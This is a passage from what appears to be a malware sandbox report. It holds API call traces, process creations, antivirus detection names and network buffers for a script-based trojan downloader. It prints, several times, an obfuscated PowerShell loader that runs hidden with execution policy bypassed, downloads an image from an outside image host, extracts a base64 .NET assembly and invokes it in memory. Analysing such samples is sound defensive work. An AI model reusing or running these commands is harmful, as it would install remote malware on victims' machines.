l♛♚Hg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚BP♛♚GY♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚ZQBu♛♚GQ♛♚RgBs♛♚GE♛♚Zw♛♚p♛♚Ds♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚GU♛♚I♛♚♛♚w♛♚C♛♚♛♚LQBh♛♚G4♛♚Z♛♚♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚HQ♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚r♛♚D0♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C4♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚Ow♛♚k♛♚GI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚Ew♛♚ZQBu♛♚Gc♛♚d♛♚Bo♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚g♛♚D0♛
♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚UwB1♛♚GI♛♚cwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚L♛♚♛♚g♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚KQ♛♚7♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚EM♛♚bwBu♛♚HY♛♚ZQBy♛♚HQ♛♚XQ♛♚6♛♚Do♛♚RgBy♛♚G8♛♚bQBC♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BT♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚p♛♚Ds♛♚J♛♚Bs♛♚G8♛♚YQBk♛♚GU♛♚Z♛♚BB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FI♛♚ZQBm♛♚Gw♛♚ZQBj♛♚HQ♛♚aQBv♛♚G4♛♚LgBB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚XQ♛♚6♛♚Do♛♚T♛♚Bv♛♚GE♛♚Z♛♚♛♚o♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚d♛♚B5♛♚H♛♚♛♚ZQ♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚u♛♚Ec♛♚ZQB0♛♚FQ♛♚eQBw♛♚GU♛♚K♛♚♛♚n♛♚EY♛♚aQBi♛♚GU♛♚cg♛♚u♛♚Eg♛♚bwBt♛♚GU♛♚Jw♛♚p♛♚Ds♛♚J♛♚Bt♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚HQ♛♚eQBw♛♚GU♛♚LgBH♛♚GU♛♚d♛♚BN♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚o♛♚Cc♛♚VgBB♛♚Ek♛♚Jw♛♚p♛♚C4♛♚SQBu♛♚HY♛♚bwBr♛♚GU♛♚K♛♚♛♚k♛♚G4♛♚dQBs♛♚Gw♛♚L♛♚♛♚g♛♚Fs♛♚bwBi♛♚Go♛♚ZQBj♛♚HQ♛♚WwBd♛♚F0♛♚I♛♚♛♚o♛♚Cc♛♚Z♛♚BI♛♚Gg♛♚M♛♚BM♛♚G4♛♚a♛♚♛♚z♛♚Fo♛♚MgBZ♛♚Ho♛♚T♛♚B6♛♚GM♛♚M♛♚BM♛♚Go♛♚WQ♛♚w♛♚E0♛♚aQ♛♚0♛♚Hk♛♚TwBT♛♚DQ♛♚e♛♚BP♛♚FM♛♚O♛♚B2♛♚E8♛♚bgBC♛♚D♛♚♛♚Z♛♚BH♛♚Gc♛♚PQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚ZgBk♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GE♛♚Z♛♚Bz♛♚GE♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚YwB1♛♚Cc♛♚KQ♛♚p♛♚♛♚==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000584
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚DY♛♚Ng♛♚v♛♚DY♛♚O♛♚♛♚z♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚agBz♛♚C4♛♚agBw♛♚Gc♛♚Pw♛♚x♛♚Dc♛♚M♛♚♛♚w♛♚DE♛♚O♛♚♛♚z♛♚Dg♛♚Ng♛♚0♛♚Cc♛♚Ow♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C♛♚♛♚PQ♛♚g♛♚E4♛♚ZQB3♛♚C0♛♚TwBi♛♚Go♛♚ZQBj♛♚HQ♛♚I♛♚BT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚E4♛♚ZQB0♛♚C4♛♚VwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚Ow♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B3♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚u♛♚EQ♛♚bwB3♛♚G4♛♚b♛♚Bv♛♚GE♛♚Z♛♚BE♛♚GE♛♚d♛♚Bh♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚KQ♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBF♛♚G4♛♚YwBv♛♚GQ♛♚aQBu♛♚Gc♛♚XQ♛♚6♛♚Do♛♚VQBU♛♚EY♛♚O♛♚♛♚u♛♚Ec♛♚ZQB0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚QgB5♛♚HQ♛♚ZQBz♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚UwBU♛♚EE♛♚UgBU♛♚D4♛♚Pg♛♚n♛♚Ds♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚RQBO♛♚EQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚BP♛♚GY♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚ZQBu♛♚GQ♛♚RgBs♛♚GE♛♚Zw♛♚p♛♚Ds♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚GU♛♚I♛♚♛♚w♛♚C♛♚♛♚LQBh♛♚G4♛♚Z♛♚♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚HQ♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚r♛♚D0♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C4♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚Ow♛♚k♛♚GI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚Ew♛♚ZQBu♛♚Gc♛♚d♛♚Bo♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚UwB1♛♚GI♛♚cwB0♛♚HI
♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚L♛♚♛♚g♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚KQ♛♚7♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚EM♛♚bwBu♛♚HY♛♚ZQBy♛♚HQ♛♚XQ♛♚6♛♚Do♛♚RgBy♛♚G8♛♚bQBC♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BT♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚p♛♚Ds♛♚J♛♚Bs♛♚G8♛♚YQBk♛♚GU♛♚Z♛♚BB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FI♛♚ZQBm♛♚Gw♛♚ZQBj♛♚HQ♛♚aQBv♛♚G4♛♚LgBB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚XQ♛♚6♛♚Do♛♚T♛♚Bv♛♚GE♛♚Z♛♚♛♚o♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚d♛♚B5♛♚H♛♚♛♚ZQ♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚u♛♚Ec♛♚ZQB0♛♚FQ♛♚eQBw♛♚GU♛♚K♛♚♛♚n♛♚EY♛♚aQBi♛♚GU♛♚cg♛♚u♛♚Eg♛♚bwBt♛♚GU♛♚Jw♛♚p♛♚Ds♛♚J♛♚Bt♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚HQ♛♚eQBw♛♚GU♛♚LgBH♛♚GU♛♚d♛♚BN♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚o♛♚Cc♛♚VgBB♛♚Ek♛♚Jw♛♚p♛♚C4♛♚SQBu♛♚HY♛♚bwBr♛♚GU♛♚K♛♚♛♚k♛♚G4♛♚dQBs♛♚Gw♛♚L♛♚♛♚g♛♚Fs♛♚bwBi♛♚Go♛♚ZQBj♛♚HQ♛♚WwBd♛♚F0♛♚I♛♚♛♚o♛♚Cc♛♚Z♛♚BI♛♚Gg♛♚M♛♚BM♛♚G4♛♚a♛♚♛♚z♛♚Fo♛♚MgBZ♛♚Ho♛♚T♛♚B6♛♚GM♛♚M♛♚BM♛♚Go♛♚WQ♛♚w♛♚E0♛♚aQ♛♚0♛♚Hk♛♚TwBT♛♚DQ♛♚e♛♚BP♛♚FM♛♚O♛♚B2♛♚E8♛♚bgBC♛♚D♛♚♛♚Z♛♚BH♛♚Gc♛♚PQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚ZgBk♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GE♛♚Z♛♚Bz♛♚GE♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚YwB1♛♚Cc♛♚KQ♛♚p♛♚♛♚==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 2804
thread_handle: 0x00000448
process_identifier: 2800
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jpg?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lnh3Z2YzLzc0LjY0Mi4yOS4xOS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000044c
1 1 0
Symantec ISB.Downloader!gen40
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan.Script.SAgent.gen
NANO-Antivirus Trojan.Script.Heuristic-js.iacgm
Kingsoft Script.Trojan.SAgent.gen
ZoneAlarm HEUR:Trojan.Script.SAgent.gen
Rising Trojan.Undefined!8.1327C (TOPIS:E0:27pLkxQ5kpB)
AVG Script:SNH-gen [Trj]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data sent yuee=D:ûØâ"¾Aԑ_¨«™“,' îN`ŗ_Îín³/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
Data sent FBAcÆVž®?g—Ò¼‹Æ ™ÿ_x4‚ûfOŽ, ¼´ž×øTÈ¥×ZEå׶¦š•ç¯YºÊ纫C÷²—Aµ0CcÛ •žíq¨U(Ph$ð=›z5 Ž}ËÝsxkµÂ‹Âw„ l<® ©*:%?
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

WSASend

buffer: kgee=@¥Ë¡š®òHОAú ٍ¾YBBáãm”ƒ/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 600
0 0

WSASend

buffer: FBA]Yý;ÍöxÂÒ¥ÙDÓݬáèü/±RôOök”X® XŽ°¦ô©äPÿ>Z ‡ò’ü.Ӏè >h^0zwkO#¼€=ÌiØvûjaÌËèˆÂ³_ P6ÅQ&°fƒÌ¯… ÏÛØk06»
socket: 600
0 0

WSASend

buffer: ÀYŸ– ٙÌ ·â™š*-#¢:¾ŽB”Þ·]vÔuÐ0ÚS0õg«|ZÑ΅2 P„2'ÎÐʇP¬Å'Öø“-„T“]Üܔ{ÕjVN2:ê0&éƒã`¦™F' ®´!݆«ÖPz·DñÓ®lhÁœõ§ëöáP#äo²æãQ´n pÓ[álÆxòpÜ9‡>Š½z:¯,ÛpߺCïÐv ys¢È:öÙÄ{s£G°^íÊg­7ûËB-~Ö
socket: 600
0 0

send

buffer: yuee=D:ûØâ"¾Aԑ_¨«™“,' îN`ŗ_Îín³/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
socket: 1444
sent: 126
1 126 0

send

buffer: FBAcÆVž®?g—Ò¼‹Æ ™ÿ_x4‚ûfOŽ, ¼´ž×øTÈ¥×ZEå׶¦š•ç¯YºÊ纫C÷²—Aµ0CcÛ •žíq¨U(Ph$ð=›z5 Ž}ËÝsxkµÂ‹Âw„ l<® ©*:%?
socket: 1444
sent: 134
1 134 0

WSASend

buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 2032
0 0
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jpg?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lnh3Z2YzLzc0LjY0Mi4yOS4xOS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚DY♛♚Ng♛♚v♛♚DY♛♚O♛♚♛♚z♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚agBz♛♚C4♛♚agBw♛♚Gc♛♚Pw♛♚x♛♚Dc♛♚M♛♚♛♚w♛♚DE♛♚O♛♚♛♚z♛♚Dg♛♚Ng♛♚0♛♚Cc♛♚Ow♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C♛♚♛♚PQ♛♚g♛♚E4♛♚ZQB3♛♚C0♛♚TwBi♛♚Go♛♚ZQBj♛♚HQ♛♚I♛♚BT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚E4♛♚ZQB0♛♚C4♛♚VwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚Ow♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B3♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚u♛♚EQ♛♚bwB3♛♚G4♛♚b♛♚Bv♛♚GE♛♚Z♛♚BE♛♚GE♛♚d♛♚Bh♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚KQ♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBF♛♚G4♛♚YwBv♛♚GQ♛♚aQBu♛♚Gc♛♚XQ♛♚6♛♚Do♛♚VQBU♛♚EY♛♚O♛♚♛♚u♛♚Ec♛♚ZQB0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚QgB5♛♚HQ♛♚ZQBz♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚UwBU♛♚EE♛♚UgBU♛♚D4♛♚Pg♛♚n♛♚Ds♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚RQBO♛♚EQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚BP♛♚GY♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚ZQBu♛♚GQ♛♚RgBs♛♚GE♛♚Zw♛♚p♛♚Ds♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚GU♛♚I♛♚♛♚w♛♚C♛♚♛♚LQBh♛♚G4♛♚Z♛♚♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚HQ♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚r♛♚D0♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C4♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚Ow♛♚k♛♚GI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚Ew♛♚ZQBu♛♚Gc♛♚d♛♚Bo♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚Qw
